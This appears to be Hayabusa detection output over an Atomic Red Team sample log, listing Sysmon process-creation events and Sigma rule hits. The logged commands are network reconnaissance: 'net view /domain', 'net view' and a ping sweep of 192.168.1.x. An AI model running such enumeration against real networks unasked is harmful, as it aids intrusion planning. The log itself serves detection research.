2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  view /domain  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  view  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.1  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.2  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.3  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.4  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.5  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.6  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.7  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.8  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.9  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.10  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.11  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.12  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.13  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.14  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.15  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.16  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.17  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.18  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.19  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.20  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.21  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.22  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.23  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.24  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.25  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.26  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.27  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.28  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.29  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.30  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.31  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.32  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.33  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.34  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.35  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.36  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.37  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.38  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.39  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.40  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.41  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.42  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.43  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.44  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.45  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.46  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
